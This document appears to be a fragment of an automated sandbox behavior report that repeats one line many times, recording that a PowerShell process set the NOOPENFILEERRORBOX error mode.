                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
